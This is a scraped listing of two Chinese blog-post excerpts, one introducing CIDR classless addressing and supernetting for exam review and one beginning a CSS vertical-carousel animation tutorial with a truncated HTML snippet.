带你快速通关期末 文章目录 前言一、无分类编址CIDR简介二、构成超网三、最长前缀匹配总结 前言 我们在前面知道了分类地址&#xff0c;但是分类地址又有很多缺陷&#xff1a; B类地址很快将分配完毕!路由表中的项目急剧增长! 一、无分类编址CIDR简介 无分类域间路由选择CI…

【后端学前端】第四天 css动画 垂直轮播效果(css变量、位移缩放动画、动画延迟)

1、学习信息 视频地址&#xff1a;css动画 垂直轮播效果&#xff08;css变量、位移缩放动画、动画延迟&#xff09;_哔哩哔哩_bilibili 2、源码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title>Title…